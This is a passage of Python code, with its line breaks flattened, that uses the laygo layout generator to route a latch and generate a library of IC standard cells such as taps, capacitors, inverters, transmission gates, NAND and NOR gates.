coordinate ilch0_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'I', rg_m3m4) ilch0_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'EN', rg_m3m4) ilch0_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0TINV0', 'ENB', rg_m3m4) ilch0_stb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'B', rg_m3m4) #set pin of latch 0 ilch0_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND1', 'B', rg_m3m4) #reset pin of latch 0 ilch0_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH0ND0', 'O', rg_m3m4) ilch1_i_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'I', rg_m3m4) ilch1_ck_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'EN', rg_m3m4) ilch1_ckb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1TINV0', 'ENB', rg_m3m4) ilch1_stb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'B', rg_m3m4) #set pin of latch 0 ilch1_rstb_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND1', 'B', rg_m3m4) #reset pin of latch 1 ilch1_o_xy = laygen.get_inst_pin_xy('I' + objectname_pfix + 'LCH1ND0', 'O', rg_m3m4) #clk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i12_o_xy[0], i8_i_xy[0], 5, rg_m3m4) # iclkb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i8_o_xy[0], i9_i_xy[0], 3, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_i_xy[0], ilch1_ckb_xy[0], 3, rg_m3m4) # iclk laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i9_o_xy[0], ilch1_ck_xy[0], 2, rg_m3m4) # intermediate laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], ilch0_o_xy[0], ilch1_i_xy[0], 5, rg_m3m4) # stb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch0_stb_xy[0], 6, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i10_o_xy[0], ilch1_stb_xy[0], 6, rg_m3m4) # rstb laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch0_rstb_xy[0], 7, rg_m3m4) laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4], i11_o_xy[0], ilch1_rstb_xy[0], 7, rg_m3m4) #pin if create_pin == True: laygen.pin(name='I', layer=laygen.layers['pin'][3], xy=ilch0_i_xy, gridname=rg_m3m4) laygen.pin(name='CLKB', layer=laygen.layers['pin'][3], xy=i12_i_xy, gridname=rg_m3m4) laygen.pin(name='ST', layer=laygen.layers['pin'][3], xy=i10_i_xy, gridname=rg_m3m4) laygen.pin(name='RST', layer=laygen.layers['pin'][3], xy=i11_i_xy, gridname=rg_m3m4) laygen.pin(name='O', layer=laygen.layers['pin'][3], xy=ilch1_o_xy, gridname=rg_m3m4) #power pin rvdd0_pin_xy = laygen.get_inst_pin_xy(i12.name, 'VDD', rg_m1m2) rvdd1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VDD', rg_m1m2) #(fix this) rvss0_pin_xy = laygen.get_inst_pin_xy(i12.name, 'VSS', rg_m1m2) rvss1_pin_xy = laygen.get_inst_pin_xy("I" + objectname_pfix + 'LCH1ND0', 'VSS', rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=rg_m1m2) if __name__ == '__main__': laygen = laygo.GridLayoutGenerator(config_file="laygo_config.yaml") import imp try: imp.find_module('bag') laygen.use_phantom = False except ImportError: laygen.use_phantom = True tech=laygen.tech utemplib = tech+'_microtemplates_dense' laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib) laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib) laygen.templates.sel_library(utemplib) laygen.grids.sel_library(utemplib) #laygen.templates.display() #laygen.grids.display() #library generation workinglib = tech+'_logic_templates' laygen.add_library(workinglib) laygen.sel_library(workinglib) if os.path.exists(workinglib+'.yaml'): #generated layout file exists laygen.load_template(filename=workinglib+'.yaml', libname=workinglib) laygen.templates.sel_library(utemplib) #grid pg = 'placement_basic' #placement grid rg_m1m2 = 'route_M1_M2_cmos' rg_m2m3 = 'route_M2_M3_cmos' rg_m3m4 = 'route_M3_M4_basic' rg_m1m2_pin = 'route_M1_M2_basic' rg_m2m3_pin = 'route_M2_M3_basic' # cell generation laygen.add_cell('space_1x') laygen.sel_cell('space_1x') generate_space_1x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_2x') laygen.sel_cell('space_2x') generate_space_2x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_4x') laygen.sel_cell('space_4x') generate_space_4x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_wovdd_1x') laygen.sel_cell('space_wovdd_1x') generate_space_wovdd_1x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_wovdd_2x') laygen.sel_cell('space_wovdd_2x') generate_space_wovdd_2x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('space_wovdd_4x') laygen.sel_cell('space_wovdd_4x') generate_space_wovdd_4x(laygen, objectname_pfix='SPACE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, create_pin=True) laygen.add_template_from_cell() laygen.add_cell('tap') laygen.sel_cell('tap') generate_tap(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', devname_pmos_tap='pmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tap_float') laygen.sel_cell('tap_float') generate_tap_float(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', devname_pmos_tap='pmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tap_float_pmos_vss') laygen.sel_cell('tap_float_pmos_vss') generate_tap_float_pmos_vss(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', devname_pmos_tap='pmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tap_pmos_vss') laygen.sel_cell('tap_pmos_vss') generate_tap_pmos_vss(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', devname_pmos_tap='pmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tap_wovdd') laygen.sel_cell('tap_wovdd') generate_tap_wovdd(laygen, objectname_pfix='TAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_tap='nmos4_fast_tap', origin=np.array([0, 0]), create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('bcap_4x') laygen.sel_cell('bcap_4x') generate_bcap(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_space='pmos4_fast_space', m=4, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('bcap_8x') laygen.sel_cell('bcap_8x') generate_bcap(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_space='pmos4_fast_space', m=8, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('bcap2_8x') laygen.sel_cell('bcap2_8x') generate_bcap2(laygen, objectname_pfix='BCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=8, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('dcap_2x') laygen.sel_cell('dcap_2x') generate_dcap(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_space='pmos4_fast_dmy_nf2', m=2, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('dcap_4x') laygen.sel_cell('dcap_4x') generate_dcap(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_space='pmos4_fast_dmy_nf2', m=4, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('dcap_8x') laygen.sel_cell('dcap_8x') generate_dcap(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_space='pmos4_fast_dmy_nf2', m=8, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('dcap2_4x') laygen.sel_cell('dcap2_4x') generate_dcap2(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=4, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('dcap2_8x') laygen.sel_cell('dcap2_8x') generate_dcap2(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=8, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('dcap3_8x') laygen.sel_cell('dcap3_8x') generate_dcap3(laygen, objectname_pfix='DCAP0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_space='pmos4_fast_dmy_nf2', m=8, origin=np.array([0,0]), create_pin=True) laygen.add_template_from_cell() laygen.add_cell('tie_2x') laygen.sel_cell('tie_2x') generate_tie(laygen, objectname_pfix='TIE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tie_wovdd_2x') laygen.sel_cell('tie_wovdd_2x') generate_tie_wovdd(laygen, objectname_pfix='TIE0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_1x') laygen.sel_cell('inv_1x') generate_inv_1x(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf1_left', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf1_left', devname_pmos_space='pmos4_fast_space', create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_2x') laygen.sel_cell('inv_2x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_4x') laygen.sel_cell('inv_4x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_6x') laygen.sel_cell('inv_6x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=6, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_8x') laygen.sel_cell('inv_8x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_10x') laygen.sel_cell('inv_10x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=10, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_16x') laygen.sel_cell('inv_16x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=16, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_24x') laygen.sel_cell('inv_24x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=24, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('inv_32x') laygen.sel_cell('inv_32x') generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=32, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tgate_2x') laygen.sel_cell('tgate_2x') generate_tgate(laygen, objectname_pfix='TG0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tgate_4x') laygen.sel_cell('tgate_4x') generate_tgate(laygen, objectname_pfix='TG0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('tgate_8x') laygen.sel_cell('tgate_8x') generate_tgate(laygen, objectname_pfix='TG0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_2x') laygen.sel_cell('nsw_2x') generate_nsw(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_4x') laygen.sel_cell('nsw_4x') generate_nsw(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_8x') laygen.sel_cell('nsw_8x') generate_nsw(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_12x') laygen.sel_cell('nsw_12x') generate_nsw(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=12, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_16x') laygen.sel_cell('nsw_16x') generate_nsw(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', devname_pmos_space='pmos4_fast_space', m=16, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_wovdd_2x') laygen.sel_cell('nsw_wovdd_2x') generate_nsw_wovdd(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_wovdd_4x') laygen.sel_cell('nsw_wovdd_4x') generate_nsw_wovdd(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_wovdd_8x') laygen.sel_cell('nsw_wovdd_8x') generate_nsw_wovdd(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_wovdd_12x') laygen.sel_cell('nsw_wovdd_12x') generate_nsw_wovdd(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', m=12, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nsw_wovdd_16x') laygen.sel_cell('nsw_wovdd_16x') generate_nsw_wovdd(laygen, objectname_pfix='NSW0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_nmos_space='nmos4_fast_space', m=16, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_1x') laygen.sel_cell('nand_1x') generate_nand_1x(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body_2stack='nmos4_fast_center_2stack', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body_left='pmos4_fast_center_nf1_left', devname_pmos_body_right='pmos4_fast_center_nf1_right', create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nor_2x') laygen.sel_cell('nor_2x') generate_nor(laygen, objectname_pfix='NR0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nor_4x') laygen.sel_cell('nor_4x') generate_nor(laygen, objectname_pfix='NR0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nor_8x') laygen.sel_cell('nor_8x') generate_nor(laygen, objectname_pfix='NR0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_2x') laygen.sel_cell('nand_2x') generate_nand(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=2, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_4x') laygen.sel_cell('nand_4x') generate_nand(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=4, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_8x') laygen.sel_cell('nand_8x') generate_nand(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=8, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_16x') laygen.sel_cell('nand_16x') generate_nand(laygen, objectname_pfix='ND0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf2', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf2', m=16, create_pin=True ) laygen.add_template_from_cell() laygen.add_cell('nand_match_2x') laygen.sel_cell('nand_match_2x') generate_nand_match(laygen, objectname_pfix='ND0', placement_grid=pg, 